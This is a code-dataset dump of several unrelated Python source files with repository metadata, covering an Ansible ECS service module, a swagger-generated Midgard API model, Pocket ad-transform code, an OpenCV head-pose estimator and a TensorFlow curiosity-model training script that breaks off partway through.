repeat=dict(required=False, type='int', default=10),
deployment_configuration=dict(required=False, default={}, type='dict'),
placement_constraints=dict(required=False, default=[], type='list'),
placement_strategy=dict(required=False, default=[], type='list'),
network_configuration=dict(required=False, type='dict', options=dict(
subnets=dict(type='list'),
security_groups=dict(type='list'),
assign_public_ip=dict(type='bool'),
)),
launch_type=dict(required=False, choices=['EC2', 'FARGATE'])
))
module = AnsibleAWSModule(argument_spec=argument_spec,
supports_check_mode=True,
required_if=[('state', 'present', ['task_definition', 'desired_count']),
('launch_type', 'FARGATE', ['network_configuration'])],
required_together=[['load_balancers', 'role']])
service_mgr = EcsServiceManager(module)
if module.params['network_configuration']:
if not service_mgr.ecs_api_handles_network_configuration():
module.fail_json(msg='botocore needs to be version 1.7.44 or higher to use network configuration')
network_configuration = service_mgr.format_network_configuration(module.params['network_configuration'])
else:
network_configuration = None
deployment_configuration = map_complex_type(module.params['deployment_configuration'],
DEPLOYMENT_CONFIGURATION_TYPE_MAP)
deploymentConfiguration = snake_dict_to_camel_dict(deployment_configuration)
try:
existing = service_mgr.describe_service(module.params['cluster'], module.params['name'])
except Exception as e:
module.fail_json(msg="Exception describing service '" + module.params['name'] + "' in cluster '" + module.params['cluster'] + "': " + str(e))
results = dict(changed=False)
if module.params['launch_type']:
if not module.botocore_at_least('1.8.4'):
module.fail_json(msg='botocore needs to be version 1.8.4 or higher to use launch_type')
if module.params['state'] == 'present':
matching = False
update = False
if existing and 'status' in existing and existing['status'] == "ACTIVE":
if service_mgr.is_matching_service(module.params, existing):
matching = True
results['service'] = existing
else:
update = True
if not matching:
if not module.check_mode:
role = module.params['role']
clientToken = module.params['client_token']
loadBalancers = module.params['load_balancers']
if update:
if (existing['loadBalancers'] or []) != loadBalancers:
module.fail_json(msg="It is not possible to update the load balancers of an existing service")
# update required
response = service_mgr.update_service(module.params['name'],
module.params['cluster'],
module.params['task_definition'],
module.params['desired_count'],
deploymentConfiguration,
network_configuration)
else:
for loadBalancer in loadBalancers:
if 'containerPort' in loadBalancer:
loadBalancer['containerPort'] = int(loadBalancer['containerPort'])
# doesn't exist. create it.
try:
response = service_mgr.create_service(module.params['name'],
module.params['cluster'],
module.params['task_definition'],
loadBalancers,
module.params['desired_count'],
clientToken,
role,
deploymentConfiguration,
module.params['placement_constraints'],
module.params['placement_strategy'],
network_configuration,
module.params['launch_type'])
except botocore.exceptions.ClientError as e:
module.fail_json_aws(e, msg="Couldn't create service")
results['service'] = response
results['changed'] = True
elif module.params['state'] == 'absent':
if not existing:
pass
else:
# it exists, so we should delete it and mark changed.
# return info about the cluster deleted
del existing['deployments']
del existing['events']
results['ansible_facts'] = existing
if 'status' in existing and existing['status'] == "INACTIVE":
results['changed'] = False
else:
if not module.check_mode:
try:
service_mgr.delete_service(
module.params['name'],
module.params['cluster']
)
except botocore.exceptions.ClientError as e:
module.fail_json_aws(e, msg="Couldn't delete service")
results['changed'] = True
elif module.params['state'] == 'deleting':
if not existing:
module.fail_json(msg="Service '" + module.params['name'] + " not found.")
return
# it exists, so we should delete it and mark changed.
# return info about the cluster deleted
delay = module.params['delay']
repeat = module.params['repeat']
time.sleep(delay)
for i in range(repeat):
existing = service_mgr.describe_service(module.params['cluster'], module.params['name'])
status = existing['status']
if status == "INACTIVE":
results['changed'] = True
break
time.sleep(delay)
if i is repeat - 1:
module.fail_json(msg="Service still not deleted after " + str(repeat) + " tries of " + str(delay) + " seconds each.")
return
module.exit_json(**results)
if __name__ == '__main__':
main()

| 41.839138 | 160 | 0.591621 |
| 594bf296f8bd0ad02b42744230d34ed9fffd7891 | 2,792 | py | Python | midgard_client/midgard_client/models/proxied_nodes.py | hoodieonwho/thorchain-python-client | fccfd66552e16bdab1dbb90b68022475c7a9693d | ["MIT"] | null | null | null | midgard_client/midgard_client/models/proxied_nodes.py | hoodieonwho/thorchain-python-client | fccfd66552e16bdab1dbb90b68022475c7a9693d | ["MIT"] | null | null | null | midgard_client/midgard_client/models/proxied_nodes.py | hoodieonwho/thorchain-python-client | fccfd66552e16bdab1dbb90b68022475c7a9693d | ["MIT"] | null | null | null |

# coding: utf-8
"""
Midgard Public API
The Midgard Public API queries THORChain and any chains linked via the Bifröst and prepares information about the network to be readily available for public users. The API parses transaction event data from THORChain and stores them in a time-series database to make time-dependent queries easy. Midgard does not hold critical information. To interact with BEPSwap and Asgardex, users should query THORChain directly. # noqa: E501
OpenAPI spec version: 2.5.12
Contact: devs@thorchain.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ProxiedNodes(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
}
attribute_map = {
}
def __init__(self): # noqa: E501
"""ProxiedNodes - a model defined in Swagger""" # noqa: E501
self.discriminator = None
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ProxiedNodes, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ProxiedNodes):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other

| 32.847059 | 435 | 0.588467 |
| 5199563be34d9be59e92d990cf041f820a3b4e9f | 5,141 | py | Python | app/adzerk/transform.py | Pocket/proxy-server | f7a6d668224dd2b93d0b9b0c41c91744c5b042d3 | ["Apache-2.0"] | 13 | 2019-11-04T23:55:18.000Z | 2021-11-26T07:07:46.000Z | app/adzerk/transform.py | Pocket/proxy-server | f7a6d668224dd2b93d0b9b0c41c91744c5b042d3 | ["Apache-2.0"] | 12 | 2020-02-02T10:54:21.000Z | 2021-06-10T16:12:55.000Z | app/adzerk/transform.py | Pocket/proxy-server | f7a6d668224dd2b93d0b9b0c41c91744c5b042d3 | ["Apache-2.0"] | 2 | 2020-01-15T07:38:24.000Z | 2022-01-19T19:55:59.000Z |

from urllib import parse
import json
import re
import logging
import distutils.util
from app import conf
DEFAULT_PRIORITY = 100
def to_spoc(decision):
if not decision:
return {}
custom_data = decision['contents'][0]['data']
body = decision['contents'][0].get('body')
if body:
body = json.loads(body)
events_map = {e["id"]: tracking_url_to_shim(e["url"]) for e in decision["events"]}
priority_map = conf.adzerk['priority_id_to_weight']
spoc = {
'id': decision['adId'],
'flight_id': decision['flightId'],
'campaign_id': decision['campaignId'],
'title': custom_data['ctTitle'],
'url': custom_data['ctUrl'],
'domain': custom_data['ctDomain'],
'excerpt': custom_data['ctExcerpt'],
'priority': priority_map.get(decision.get('priorityId'), DEFAULT_PRIORITY),
'context': __get_context(custom_data.get('ctSponsor')),
'raw_image_src': custom_data['ctFullimagepath'],
'image_src': __get_cdn_image(custom_data['ctFullimagepath']),
'shim': {
'click': tracking_url_to_shim(decision['clickUrl']),
'impression': tracking_url_to_shim(decision['impressionUrl']),
'delete': events_map[17],
'save': events_map[20],
},
'parameter_set': 'default',
'caps': conf.spocs['caps'],
'domain_affinities': __get_domain_affinities(custom_data.get('ctDomain_affinities')),
'personalization_models': get_personalization_models(body),
}
optional_fields = {
'ctCta': 'cta',
'ctCollectionTitle': 'collection_title',
'ctSponsor': 'sponsor',
'ctSponsoredByOverride': 'sponsored_by_override',
}
for adzerk_key, spoc_key in optional_fields.items():
if adzerk_key in custom_data and custom_data[adzerk_key]:
spoc[spoc_key] = custom_data[adzerk_key]
if 'sponsored_by_override' in spoc:
spoc['sponsored_by_override'] = __clean_sponsored_by_override(spoc['sponsored_by_override'])
spoc['min_score'] = float(custom_data.get('ctMin_score', 0.1))
spoc['item_score'] = float(custom_data.get('ctItem_score', 0.2))
try:
spoc['is_video'] = bool(distutils.util.strtobool(custom_data['ctIsVideo'].strip()))
except (KeyError, ValueError):
# Don't set is_video if ctIsVideo is not present or not a boolean (e.g. an empty string)
pass
return spoc
def tracking_url_to_shim(url):
components = parse.urlsplit(url)
path_id = conf.adzerk['telemetry_endpoint_ids'].get(components.path)
if path_id is None:
raise Exception('Not a known telemetry path: {0}'.format(components.path))
params = parse.parse_qs(components.query)
e = params['e'][0]
s = params['s'][0]
return ','.join([path_id,e,s])
def is_collection(spocs):
"""
:param spocs: A list of spocs
:return: True if the list of spocs is a sponsored collection; spocs that should be featured together.
"""
return all(spoc.get('collection_title') for spoc in spocs)
def to_collection(spocs):
"""
Transforms a list of spocs to a sponsored collection dictionary.
AdZerk does not support fields for a collection. We set them on all creatives and get them from an arbitrary one.
:param spocs: A list of spocs
:return: A dictionary with collection fields (title, flight_id, and sponsor) and a list of spocs.
"""
collection = {
'title': spocs[0]['collection_title'],
'flight_id': spocs[0]['flight_id'],
'sponsor': spocs[0]['sponsor'],
'context': __get_context(spocs[0]['sponsor']),
}
for spoc in spocs:
del spoc['collection_title']
collection['items'] = spocs
return collection
def get_personalization_models(body):
if body is None:
return {}
else:
# Topics in AdZerk prefixed with topic_ correspond with models in Firefox prefixed with nb_model_.
p = re.compile('^topic_')
return {k: 1 for k in [p.sub('', t) for t, v in body.items() if p.match(t) and v in ('true', True)]}
def __get_cdn_image(raw_image_url):
escaped = parse.quote(raw_image_url)
return 'https://img-getpocket.cdn.mozilla.net/direct?url={0}&resize=w618-h310'.format(escaped)
def __get_context(sponsor):
return 'Sponsored by {0}'.format(sponsor) if sponsor else ''
def __get_domain_affinities(name):
if name is None:
return {}
else:
return conf.domain_affinities.get(str(name).lower(), dict())
def __clean_sponsored_by_override(sponsored_by_override):
"""
Return an empty string for 'sponsored_by_override' if the value in AdZerk is set to "blank" or "empty".
@type sponsored_by_override: str
"""
return re.sub(r'^(blank|empty)$', '', sponsored_by_override.strip(), flags=re.IGNORECASE)

| 35.455172 | 117 | 0.62128 |
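
Note on the record above: in `transform.py`, `get_personalization_models` keeps only AdZerk body keys prefixed with `topic_` whose value is true-ish and strips the prefix. A small illustration with made-up keys, assuming the function is imported from the module:

```python
body = {
    "topic_business": "true",   # kept: prefix matches and value is "true"
    "topic_arts": True,         # kept: prefix matches and value is True
    "topic_tech": "false",      # dropped: value is not true-ish
    "ctTitle": "Example",       # dropped: no "topic_" prefix
}

print(get_personalization_models(body))  # {'business': 1, 'arts': 1}
```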
| 601524e09cd842e8d86ec4c8fd6005d74e3c94bd | 354 | py | Python | mir/feature/tonal/__init__.py | ansvver/pylufia | 0076b4baef1de5371476910c12c1829d694fa2f3 | ["MIT"] | null | null | null | mir/feature/tonal/__init__.py | ansvver/pylufia | 0076b4baef1de5371476910c12c1829d694fa2f3 | ["MIT"] | null | null | null | mir/feature/tonal/__init__.py | ansvver/pylufia | 0076b4baef1de5371476910c12c1829d694fa2f3 | ["MIT"] | 1 | 2021-04-08T03:15:08.000Z | 2021-04-08T03:15:08.000Z |

# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# @file: feature
# @brief:
#
# @author: sasai
# @date: 25/04/2012
# @copyright: (c) sasai 2012
# @license: <your licence>
#
# Description:
#
#-------------------------------------------------------------------------------
from chroma import *

| 20.823529 | 80 | 0.319209 |
| e8b00ae5d97685c2d5927e7d22497b77ea971e0c | 3,325 | py | Python | Assignment24/lips and eyes filter + scaling mouth/SolvePnPHeadPoseEstimation.py | BenyaminZojaji/image_processing | 0cfe3a6b826b25fcdd0de5041916aed423bfdb37 | ["MIT"] | 21 | 2021-11-05T20:24:58.000Z | 2022-02-05T07:49:28.000Z | Assignment24/lips and eyes filter/SolvePnPHeadPoseEstimation.py | BenyaminZojaji/image_processing | 0cfe3a6b826b25fcdd0de5041916aed423bfdb37 | ["MIT"] | null | null | null | Assignment24/lips and eyes filter/SolvePnPHeadPoseEstimation.py | BenyaminZojaji/image_processing | 0cfe3a6b826b25fcdd0de5041916aed423bfdb37 | ["MIT"] | 2 | 2021-12-28T02:12:22.000Z | 2022-02-09T12:39:54.000Z |

import cv2
import numpy as np
import sys
class HeadPoseEstimator:
def __init__(self, filepath, W, H) -> None:
# camera matrix
matrix = np.array([[W, 0, W/2.0],
[0, W, H/2.0],
[0, 0, 1]])
# load pre-defined 3d object points and mapping indexes
obj, index = np.load(filepath, allow_pickle=True)
obj = obj.T
def solve_pnp_wrapper(obj, index, matrix):
def solve_pnp(shape):
return cv2.solvePnP(obj, shape[index], matrix, None)
return solve_pnp
self._solve_pnp = solve_pnp_wrapper(obj, index, matrix)
def get_head_pose(self, shape):
if len(shape) != 106:
raise RuntimeError('Unsupported shape format')
_, rotation_vec, translation_vec = self._solve_pnp(shape)
rotation_mat = cv2.Rodrigues(rotation_vec)[0]
pose_mat = cv2.hconcat((rotation_mat, translation_vec))
euler_angle = cv2.decomposeProjectionMatrix(pose_mat)[-1]
return euler_angle
@staticmethod
def draw_axis(img, euler_angle, center, size=80, thickness=3,
angle_const=np.pi/180, copy=False):
if copy:
img = img.copy()
euler_angle *= angle_const
sin_pitch, sin_yaw, sin_roll = np.sin(euler_angle)
cos_pitch, cos_yaw, cos_roll = np.cos(euler_angle)
axis = np.array([
[cos_yaw * cos_roll,
cos_pitch * sin_roll + cos_roll * sin_pitch * sin_yaw],
[-cos_yaw * sin_roll,
cos_pitch * cos_roll - sin_pitch * sin_yaw * sin_roll],
[sin_yaw,
-cos_yaw * sin_pitch]
])
axis *= size
axis += center
axis = axis.astype(np.int)
tp_center = tuple(center.astype(np.int))
cv2.line(img, tp_center, tuple(axis[0]), (0, 0, 255), thickness)
cv2.line(img, tp_center, tuple(axis[1]), (0, 255, 0), thickness)
cv2.line(img, tp_center, tuple(axis[2]), (255, 0, 0), thickness)
return img
def main(filename):
from TFLiteFaceDetector import UltraLightFaceDetecion
from TFLiteFaceAlignment import CoordinateAlignmentModel
cap = cv2.VideoCapture(filename)
fd = UltraLightFaceDetecion("weights/RFB-320.tflite",
conf_threshold=0.95)
fa = CoordinateAlignmentModel("weights/coor_2d106.tflite")
hp = HeadPoseEstimator("weights/head_pose_object_points.npy",
cap.get(3), cap.get(4))
color = (125, 255, 125)
while True:
ret, frame = cap.read()
if not ret:
break
bboxes, _ = fd.inference(frame)
for pred in fa.get_landmarks(frame, bboxes):
for p in np.round(pred).astype(np.int):
cv2.circle(frame, tuple(p), 1, color, 1, cv2.LINE_AA)
face_center = np.mean(pred, axis=0)
euler_angle = hp.get_head_pose(pred).flatten()
print(*euler_angle)
hp.draw_axis(frame, euler_angle, face_center)
cv2.imshow("result", frame)
if cv2.waitKey(0) == ord('q'):
break
if __name__ == '__main__':
main(sys.argv[1])

| 31.074766 | 73 | 0.563308 |
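
Note on the record above: `SolvePnPHeadPoseEstimation.py` estimates head pose (pitch, yaw, roll) from 106 facial landmarks via `cv2.solvePnP`, and its `main()` runs the full detector/aligner pipeline on a video (`python SolvePnPHeadPoseEstimation.py input.mp4`). A minimal sketch of using the estimator class directly, assuming the repo's weights file is present and using placeholder frame dimensions and landmarks:

```python
import numpy as np

# Hypothetical 640x480 frames; the .npy path is the one referenced in the script above.
hp = HeadPoseEstimator("weights/head_pose_object_points.npy", 640, 480)

landmarks = np.zeros((106, 2), dtype=np.float32)  # stand-in for real aligner output
# euler = hp.get_head_pose(landmarks)             # 3x1 array: pitch, yaw, roll (degrees)
```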
| 591e3014f83f2cd6c4593834030cfd395f8e4707 | 18,808 | py | Python | scripts/uncertainty_scripts/train_all_diffobj.py | neuroailab/curiosity_deprecated | 65f7cde13b07cdac52eed39535a94e7544c396b8 | ["Apache-2.0"] | null | null | null | scripts/uncertainty_scripts/train_all_diffobj.py | neuroailab/curiosity_deprecated | 65f7cde13b07cdac52eed39535a94e7544c396b8 | ["Apache-2.0"] | 2 | 2017-11-18T00:53:33.000Z | 2017-11-18T00:53:40.000Z | scripts/uncertainty_scripts/train_all_diffobj.py | neuroailab/curiosity_deprecated | 65f7cde13b07cdac52eed39535a94e7544c396b8 | ["Apache-2.0"] | null | null | null |

'''
Random actions, after index mismatch bug.
'''
import sys
sys.path.append('/home/nhaber/projects/curiosity')
sys.path.append('/home/nhaber/projects/tfutils')
import tensorflow as tf
from curiosity.interaction import train, environment, data, static_data, cfg_generation, update_step, mode_switching
import curiosity.interaction.models as models
from tfutils import base, optimizer
import numpy as np
import os
import argparse
import copy
parser = argparse.ArgumentParser()
parser.add_argument('-g', '--gpu', default = '0', type = str)
parser.add_argument('-wmea', '--wmencarchitecture', default = 2, type = int)
parser.add_argument('-wmfca', '--wmfcarchitecture', default = 4, type = int)
parser.add_argument('-wmmbca', '--wmmbcarchitecture', default = -1, type = int)
parser.add_argument('-umea', '--umencarchitecture', default = 0, type = int)
parser.add_argument('-umfca', '--umfcarchitecture', default = 2, type = int)
parser.add_argument('-ummbaa', '--ummbaarchitecture', default = 1, type = int)
parser.add_argument('--umlr', default = 1e-3, type = float)
parser.add_argument('--actlr', default = 1e-4, type = float)
#parser.add_argument('--loss', default = 0, type = int)
parser.add_argument('--tiedencoding', default = False, type = bool)
parser.add_argument('--heat', default = 1., type = float)
parser.add_argument('--egoonly', default = False, type = bool)
parser.add_argument('--zeroedforce', default = False, type = bool)
parser.add_argument('--optimizer', default = 'adam', type = str)
parser.add_argument('--batching', default = 'uniform', type = str)
parser.add_argument('--batchsize', default = 32, type = int)
parser.add_argument('--numperbatch', default = 8, type = int)
parser.add_argument('--historylen', default = 1000, type = int)
parser.add_argument('--ratio', default = 2 / .17, type = float)
parser.add_argument('--objsize', default = .4, type = float)
parser.add_argument('--lossfac', default = 1., type = float)
parser.add_argument('--nclasses', default = 4, type = int)
#parser.add_argument('--t1', default = .05, type = float)
#parser.add_argument('--t2', default = .3, type = float)
#parser.add_argument('--t3', default = .6, type = float)
parser.add_argument('-at', '--actionthreshold', default = .1, type = float)
parser.add_argument('-ut', '--uncertaintythreshold', default = .1, type = float)
parser.add_argument('--modelseed', default = 0, type = int)
parser.add_argument('--gather', default = 48, type = int)
parser.add_argument('--testmode', default = False, type = bool)
parser.add_argument('-ds', '--dataseed', default = 0, type = int)
parser.add_argument('-nenv', '--numberofenvironments', default=4, type = int)
parser.add_argument('--loadstep', default = -1, type = int)
parser.add_argument('--rendernode', default = 'render1', type = str)
parser.add_argument('--objseed', default = 1, type = int)
N_ACTION_SAMPLES = 1000
EXP_ID_PREFIX = 'do'
NUM_BATCHES_PER_EPOCH = 1e8
IMAGE_SCALE = (128, 170)
ACTION_DIM = 5
NUM_TIMESTEPS = 3
T_PER_STATE = 2
args = vars(parser.parse_args())
obj_seed = args['objseed']
render_node = args['rendernode']
RENDER1_HOST_ADDRESS = cfg_generation.get_ip(render_node)
STATE_STEPS = [-1, 0]
STATES_GIVEN = [-2, -1, 0, 1]
ACTIONS_GIVEN = [-2, -1, 1]
OBJTHERE_TEST_METADATA_LOC = '/media/data4/nhaber/one_room_dataset/diffobj' + str(args['objseed']) + '_meta.pkl'
s_back = - (min(STATES_GIVEN) + min(STATE_STEPS))
s_forward = max(STATES_GIVEN) + max(STATE_STEPS)
a_back = - min(ACTIONS_GIVEN)
a_forward = max(ACTIONS_GIVEN)
def online_agg_func(agg_res, res, step):
if agg_res is None:
agg_res = {k : [] for k in res}
for k, v in res.items():
agg_res[k].append(v)
return agg_res
def agg_func(res):
return res
test_mode = args['testmode']
act_thresholds = [-args['actionthreshold'], args['actionthreshold']]
n_classes_wm = len(act_thresholds) + 1
um_thresholds = [args['uncertaintythreshold']]
n_classes_um = len(um_thresholds) + 1
batch_size = args['batchsize']
wm_encoding_choices = [
{
'sizes' : [3, 3, 3, 3],
'strides' : [2, 2, 2, 2],
'num_filters' : [32, 32, 32, 32],
'bypass' : [None, None, None, None]
},
{
'sizes' : [7, 3, 3, 3],
'strides' : [3, 2, 2, 2],
'num_filters' : [32, 32, 32, 32],
'bypass' : [0, 0, 0, 0]
},
{
'sizes' : [7, 3, 3, 3, 3],
'strides' : [3, 2, 2, 2, 2],
'num_filters' : [32, 32, 32, 32, 32],
'bypass' : [0, 0, 0, 0, 0]
},
{
'sizes' : [7, 3, 3, 3, 3],
'strides' : [2, 2, 1, 1, 1],
'num_filters' : [4, 4, 4, 4, 4],
'bypass' : [0, 0, 0, 0, 0]
}
]
wm_mlp_before_concat_choices = [
{
'num_features' : [500, 10],
'nonlinearities' : ['relu', 'relu']
},
{
'num_features' : [500, 50],
'nonlinearities' : ['relu', 'relu']
}
]
wm_mlp_choices = [
{
'num_features' : [256, ACTION_DIM * n_classes_wm],
'nonlinearities' : ['relu', 'identity'],
'dropout' : [None, None]
},
{
'num_features' : [50, 50, ACTION_DIM * n_classes_wm],
'nonlinearities' : ['relu', 'relu', 'identity'],
'dropout' : [None, None, None]
},
{
'num_features' : [50, 50, ACTION_DIM * n_classes_wm],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None]
},
{
'num_features' : [100, 100, 100, ACTION_DIM * n_classes_wm],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None, None]
},
{
'num_features' : [500, 500, ACTION_DIM * n_classes_wm],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None]
},
{
'num_features' : [1000, 1000, 500, ACTION_DIM * n_classes_wm],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None, None]
}
]
wm_encoding_choice = wm_encoding_choices[args['wmencarchitecture']]
wm_mlp_choice = wm_mlp_choices[args['wmfcarchitecture']]
wm_cfg = {
'num_timesteps' : NUM_TIMESTEPS,
'state_steps' : [-1, 0],
'image_shape' : list(IMAGE_SCALE) + [3],
'states_given' : [-2, -1, 0, 1],
'actions_given' : [-2, -1, 1],
'act_dim' : ACTION_DIM,
'encode' : cfg_generation.generate_conv_architecture_cfg(**wm_encoding_choice),
'action_model' : {
'loss_func' : models.binned_softmax_loss_per_example,
'thresholds' : act_thresholds,
'loss_factor' : 1.,
'mlp' : cfg_generation.generate_mlp_architecture_cfg(**wm_mlp_choice)
},
'norepeat' : True
}
mbc_idx = args['wmmbcarchitecture']
if mbc_idx != -1:
wm_mbc_choice = wm_mlp_before_concat_choices[mbc_idx]
wm_cfg['action_model']['mlp_before_concat'] = cfg_generation.generate_mlp_architecture_cfg(**wm_mbc_choice)
um_encoding_choices = [
{
'sizes' : [7, 3, 3, 3],
'strides' : [3, 2, 2, 2],
'num_filters' : [32, 32, 32, 32],
'bypass' : [0, 0, 0, 0]
},
{
'sizes' : [7, 3],
'strides' : [3, 2],
'num_filters' : [16, 2],
'bypass' : [0, 0]
},
{
'sizes' : [7, 3, 3, 3, 3],
'strides' : [3, 2, 2, 2, 2],
'num_filters' : [32, 32, 32, 32, 32],
'bypass' : [0, 0, 0, 0, 0]
}
]
shared_mlp_choices = [
{
'num_features' : [100, 100],
'nonlinearities' : ['relu', 'relu'],
'dropout' : [None, None]
},
{
'num_features' : [50, 50],
'nonlinearities' : ['relu', 'relu'],
'dropout' : [None, None]
},
{
'num_features' : [500],
'nonlinearities' : ['relu'],
'dropout' : [None]
},
{
'num_features' : [50, 50],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu']],
'dropout' : [None, None]
}
]
separate_mlp_choices_proto = {
'num_features' : [n_classes_um],
'nonlinearities' : ['identity'],
'dropout' : [None]
}
separate_mlp_choice = dict((t, separate_mlp_choices_proto) for t in range(NUM_TIMESTEPS))
mlp_before_action_choices = [
{
'num_features' : [500, 10],
'nonlinearities' : ['relu', 'relu']
},
{
'num_features' : [500, 50],
'nonlinearities' : ['relu', 'relu']
},
{
'num_features' : [300, 100],
'nonlinearities' : ['relu', 'relu']
}
]
um_encoding_args = um_encoding_choices[args['umencarchitecture']]
um_mlp_before_act_args = mlp_before_action_choices[args['ummbaarchitecture']]
um_mlp_args = shared_mlp_choices[args['umfcarchitecture']]
um_cfg = {
'shared_encode' : cfg_generation.generate_conv_architecture_cfg(desc = 'encode', **um_encoding_args),
'shared_mlp_before_action' : cfg_generation.generate_mlp_architecture_cfg(**um_mlp_before_act_args),
'shared_mlp' : cfg_generation.generate_mlp_architecture_cfg(**um_mlp_args),
        'mlp' : dict((t, cfg_generation.generate_mlp_architecture_cfg(**choice_args)) for t, choice_args in separate_mlp_choice.items()),
'loss_func' : models.ms_sum_binned_softmax_loss,
'thresholds' : um_thresholds,
'loss_factor' : args['lossfac'],
'n_action_samples' : N_ACTION_SAMPLES,
'heat' : args['heat'],
}
model_cfg = {
'world_model' : wm_cfg,
'uncertainty_model' : um_cfg,
'seed' : args['modelseed']
}
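# Note: with decay_rate = 1.0, tf.train.exponential_decay leaves the learning rate constant;
# the decay_steps / staircase settings below only take effect if decay_rate is changed.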
lr_params = {
'world_model' : {
'act_model' : {
'func': tf.train.exponential_decay,
'learning_rate': args['actlr'],
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
},
'fut_model' : {
'func': tf.train.exponential_decay,
'learning_rate': args['actlr'],
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
},
'uncertainty_model' : {
'func': tf.train.exponential_decay,
'learning_rate': args['umlr'],
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
}
if args['optimizer'] == 'adam':
optimizer_class = tf.train.AdamOptimizer
optimizer_params = {
'world_model' : {
'act_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
},
'fut_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
}
},
'uncertainty_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
}
}
elif args['optimizer'] == 'momentum':
optimizer_class = tf.train.MomentumOptimizer
optimizer_params = {
'world_model' : {
'act_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
'momentum' : .9
},
'fut_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
'momentum' : .9
}
},
'uncertainty_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
'momentum' : .9
}
}
def get_static_data_provider(data_params, model_params, action_model):
data_params_copy = copy.copy(data_params)
data_params_copy.pop('func')
return static_data.OfflineDataProvider(**data_params_copy)
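# The 'func' key points back to this factory, so it is stripped before the remaining keyword
# arguments are forwarded to OfflineDataProvider; the model_params and action_model arguments
# are unused here.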
train_params = {
'updater_func' : update_step.FreezeUpdater,
'updater_kwargs' : {
'state_desc' : 'depths1',
'freeze_wm' : False,
'freeze_um' : False,
'map_draw_mode' : 'specified_indices',
'map_draw_example_indices' : [0, batch_size - 1],
'map_draw_timestep_indices' : [1, 2],
'map_draw_freq' : 10 if test_mode else 1000
},
#'post_init_transform' : mode_switching.panic_reinit
}
def get_ms_models(cfg):
world_model = models.MoreInfoActionWorldModel(cfg['world_model'])
uncertainty_model = models.MSExpectedUncertaintyModel(cfg['uncertainty_model'], world_model)
return {'world_model' : world_model, 'uncertainty_model' : uncertainty_model}
model_params = {
'func' : get_ms_models,
'cfg' : model_cfg,
'action_model_desc' : 'uncertainty_model'
}
one_obj_scene_info = [
{
'type' : 'SHAPENET',
'scale' : args['objsize'],
'mass' : 1.,
'scale_var' : .01,
'num_items' : 1,
}
]
force_scaling = 200.
room_dims = (5, 5)
my_rng = np.random.RandomState(0)
history_len = args['historylen']
if test_mode:
history_len = 50
batch_size = args['batchsize']
data_lengths = {
'obs' : {'depths1' : s_back + s_forward + NUM_TIMESTEPS},
'action' : a_back + a_forward + NUM_TIMESTEPS,
'action_post' : a_back + a_forward + NUM_TIMESTEPS}
n_env = args['numberofenvironments']
dp_config = {
'func' : train.get_batching_data_provider,
'n_environments': n_env,
'action_limits' : np.array([1., 1.] + [force_scaling for _ in range(ACTION_DIM - 2)]),
'environment_params' : {
'random_seed' : obj_seed,
'unity_seed' : 1,
'room_dims' : room_dims,
'state_memory_len' : {
'depths1' : history_len + s_back + s_forward + NUM_TIMESTEPS
},
'action_memory_len' : history_len + a_back + a_forward + NUM_TIMESTEPS,
'message_memory_len' : history_len + a_back + a_forward + NUM_TIMESTEPS,
'other_data_memory_length' : 32,
'rescale_dict' : {
'depths1' : IMAGE_SCALE
},
'USE_TDW' : True,
'host_address' : RENDER1_HOST_ADDRESS,
'rng_periodicity' : 1,
'termination_condition' : environment.obj_not_present_termination_condition,
'selected_build' : 'three_world_locked_rot.x86_64'
},
'provider_params' : {
'batching_fn' : lambda hist : data.uniform_experience_replay(hist, history_len, my_rng = my_rng, batch_size = batch_size / n_env,
get_object_there_binary = False, data_lengths = data_lengths, which_matters_for_freq = -2),
'capacity' : 5,
'gather_per_batch' : args['gather'] / n_env,
'gather_at_beginning' : history_len + T_PER_STATE + NUM_TIMESTEPS
},
'scene_list' : [one_obj_scene_info],
'scene_lengths' : [1024 * 32],
'do_torque' : False,
'use_absolute_coordinates' : False
}
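# Each of the n_env environments contributes batch_size / n_env examples per training batch
# (via batching_fn above) and gathers args['gather'] / n_env new steps per batch.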
validate_params = {
